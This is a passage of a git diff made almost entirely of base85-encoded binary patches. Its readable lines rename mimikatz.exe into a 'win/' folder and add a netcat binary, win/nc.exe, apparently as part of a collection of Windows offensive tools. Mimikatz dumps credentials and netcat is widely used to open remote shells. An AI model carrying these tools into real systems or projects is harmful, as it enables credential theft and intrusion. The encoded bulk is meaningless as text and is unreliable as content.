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 TAwfn6j$yY+{%dd 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 b&{mJz|B>EbD79qb@}4Z6{_gjWjspJ=>s1Qf literal 0 HcmV?d00001 
diff --git a/mimikatz.exe b/win/mimikatz.exe similarity index 100% rename from mimikatz.exe rename to win/mimikatz.exe 
diff --git a/win/nc.exe b/win/nc.exe new file mode 100644 index 0000000000000000000000000000000000000000..2119d68bcfeeed4375a0ea3055c984849d5230e0 GIT binary patch literal 38616 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 